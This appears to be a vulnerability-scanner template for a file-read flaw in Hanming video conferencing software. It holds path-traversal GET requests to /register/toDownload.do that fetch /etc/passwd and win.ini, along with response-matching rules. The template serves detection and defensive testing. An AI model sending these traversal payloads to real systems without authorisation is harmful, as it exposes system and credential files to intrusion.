id: hanming-video-conferencing-file-read

info:
    name: Hanming Video Conferencing File Read
    author: kzaopa(https://github.com/kzaopa)
    severity: high

rules:
    linux0:
        request:
            method: GET
            path: /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd
        expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
    windows0:
        request:
            method: GET
            path: /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini
        expression: response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]"))
expression: windows0() || linux0()

